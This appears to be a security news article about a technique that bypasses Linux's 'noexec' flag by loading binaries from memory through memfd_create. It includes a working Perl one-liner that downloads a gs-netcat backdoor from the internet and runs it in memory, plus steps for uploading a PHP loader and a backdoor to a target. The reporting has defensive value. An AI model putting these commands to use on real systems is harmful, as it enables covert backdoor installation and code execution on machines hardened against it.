Linux Systems Vulnerable to New ‘noexec’ Bypass Technique: Arbitrary Code Execution Now Possible

by do son · Published October 15, 2024 · Updated October 24, 2024

Security researchers have unveiled a novel technique that allows attackers to bypass the ‘noexec’ flag in Linux systems, potentially enabling the execution of malicious code even on partitions specifically configured to prevent it.

The ‘noexec’ flag is a crucial security measure in Linux, preventing the execution of binary files on designated partitions, such as /tmp or /dev/shm. This restriction is designed to thwart attackers who attempt to upload and execute malware on these commonly targeted areas. However, the newly discovered method circumvents this protection using a clever combination of Perl, Bash, and PHP scripts.

What makes this technique particularly concerning is its ability to execute binaries downloaded directly from the internet, even on partitions with ‘noexec’ enabled. This vulnerability, often explored in a CEH certification course, leverages system calls like memfd_create and execveat to inject shellcode into running processes and load binaries from memory. Moreover, the method doesn’t require root privileges, widening the pool of potential attackers.

Researchers have demonstrated the technique’s effectiveness by showcasing examples where common commands like id are executed without root access, even on ‘noexec’ partitions. More alarmingly, they have shown how attackers could use this method to download and execute malicious payloads from remote servers using simple commands.

A Perl example demonstrates how the ‘id’ command can be executed without root privileges:

source memexec-perl.sh
cat /usr/bin/id | memexec -u

In Bash, this can be achieved similarly:

source memexec-bash.sh
cat /usr/bin/id | memexec

The educated reader understands that this is mostly used to pipe a backdoor from the Internet directly into memory, even when execution is prohibited by noexec:

curl -SsfL https://gsocket.io/bin/gs-netcat_mini-linux-x86_64 | GS_ARGS="-ilDq -s ChangeMe" perl '-efor(319,279){($f=syscall$_,$",1)>0&&last};open($o,">&=".$f);print$o(<STDIN>);exec{"/proc/$$/fd/$f"}X,@ARGV' -- "$@"

The method effectively bypasses command execution restrictions in PHP through similar scripts, representing a significant vulnerability for systems relying on such restrictions to guard against malicious code.

Upload memexec.php and egg (your backdoor) onto the target
Call curl -SsfL https://target/memexec.php will execute egg

Researchers continue to analyze this technique and its potential implications for Linux system security, emphasizing the importance of implementing additional safeguards to prevent the use of this method in real-world attacks. It is also recommended to monitor access to system calls and restrict their use, particularly in environments with heightened security requirements.